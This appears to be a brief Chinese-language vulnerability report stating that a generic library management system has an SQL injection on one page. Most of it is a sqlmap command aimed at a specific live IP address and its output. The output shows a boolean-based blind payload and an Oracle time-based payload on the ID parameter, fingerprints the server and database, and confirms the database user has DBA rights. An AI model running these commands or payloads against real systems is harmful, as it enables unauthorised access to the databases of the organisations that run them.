某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dba
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=123 AND 7478=7478
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ID=123 AND 9273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111)||CHR(105)||CHR(98),5)
---
[11:34:18] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[11:34:18] [INFO] testing if current user is DBA
current user is DBA: True
[11:34:25] [INFO]